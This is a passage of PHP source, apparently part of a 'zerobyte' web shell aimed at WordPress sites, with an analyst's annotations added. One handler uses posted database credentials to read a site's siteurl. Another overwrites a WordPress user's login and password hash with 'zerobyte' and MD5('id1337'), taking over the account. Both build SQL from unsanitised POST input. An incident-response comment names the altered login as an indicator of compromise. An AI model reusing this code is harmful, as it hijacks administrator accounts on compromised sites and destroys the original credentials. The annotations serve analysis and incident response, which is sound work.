  // as "[DOMAIN] ...". $namedb and the discovered table name are concatenated
  // into the SQL text.
  613. if($_GET['grab'] == 'wp_options') {
  614. $userdb = $_POST['wpuser'];
  615. $passdb = $_POST['wppass'];
  616. $namedb = $_POST['wpdb'];
  617. $hostdb = $_POST['wphost'];
  618. echo 'WP_OPTIONS';
  619. if(!empty($userdb)) {
  620. $link = mysql_connect($hostdb, $userdb, $passdb);
  621. if (!$link) {die('Could not connect: ' . mysql_error());}
  622. if (!mysql_select_db($namedb)) {die('Could not select database: ' . mysql_error());}
  623. //
  624. $tblz = mysql_query("SELECT table_name FROM information_schema.tables WHERE table_schema='".$namedb."' AND table_name LIKE '%_options' LIMIT 1");
  625. if (!$tblz) {die('Could not query:' . mysql_error());}
  626. $tbl = mysql_result($tblz, 0, 'table_name'); // name of the matched *_options table
  627. $result = mysql_query("SELECT option_value FROM ".$tbl." WHERE option_name = 'siteurl' AND option_id = '1'");
  628. if (!$result) {die('Tbl Could not query:' . mysql_error());}
  629. echo "\n".'[DOMAIN] '.mysql_result($result, 0, 'option_value')."\n"; // prints the site's siteurl value
  630. mysql_close($link);
  631. }
  // grab=wp_users_updt: account takeover of a WordPress user. Connects with
  // mysqli and overwrites the first row of <prefix>users that has
  // user_status = '0', setting user_login to 'zerobyte' and user_pass to
  // MD5('id1337'). $prefix comes from the POST body and is concatenated into
  // the statement.
  // Incident-response note: a users-table row with user_login 'zerobyte' is a
  // direct indicator that this ran; the original login name and password hash
  // of that row are overwritten and must be restored from backup.
  632. } else if($_GET['grab'] == 'wp_users_updt') {
  633. $userdb = $_POST['wpuser'];
  634. $passdb = $_POST['wppass'];
  635. $namedb = $_POST['wpdb'];
  636. $hostdb = $_POST['wphost'];
  637. $prefix = $_POST['tpfx'];
  638. echo 'WP_USERS';
  639. $conn = new mysqli($hostdb, $userdb, $passdb, $namedb);
  640. if ($conn->connect_error) {
  641. die("Connection failed: " . $conn->connect_error);
  642. }
  643. $sql = "UPDATE ".$prefix."users SET user_login = 'zerobyte', user_pass = MD5('id1337') WHERE user_status = '0' LIMIT 1";
  644. if ($conn->query($sql) === TRUE) {
  645. echo "Record updated successfully";
  646. } else {
  647. echo "Error updating record: " . $conn->error;
  648. }
  649. $conn->close();
  650. }
  651. ### BACKUPWORDPRESS BASH ADD-ON EOF ###
  652.  
  653.  
  654.  
  655. ### FOOTER ###
  // Footer: a link to https://zerobyte.id/ whose text is produced by eof(), then
  // the closing tags for the footer and the page container.
  656. echo '<div class="footer">';
  657. echo '&copy; 2018 - <a href="https://zerobyte.id/" rel="nofollow" target="_blank">';
  658. eof();
  659. echo '</a>';
  660. echo '</div>';
  661. echo '</div>';
  662. ?>